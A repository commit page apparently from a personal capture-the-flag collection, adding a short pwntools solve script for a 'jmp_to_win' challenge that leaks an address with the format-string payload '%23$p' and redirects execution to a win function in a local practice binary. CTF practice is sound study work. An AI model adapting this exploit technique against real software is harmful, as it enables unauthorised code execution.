jc/ctfs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

solve script

Browse Source
This commit is contained in:
jc
2025-03-12 21:26:39 +03:00
parent 37f00f4322
commit 7ccc26a4f6
1 changed files with 21 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
random_challs/jmp_to_win/a.py
+21
View File
@@ -0,0 +1,21 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./vuln", checksec=False)
r = process()
# funcs
s = lambda a: r.sendlineafter(b":", a)
# leak
s(b"%23$p")
main = int(r.recvline(), 16)
log.info("main: %#x", main)
win = main - 0x96
log.info("win: %#x", win)
# jmp
s(str(hex(win)).encode())
r.interactive()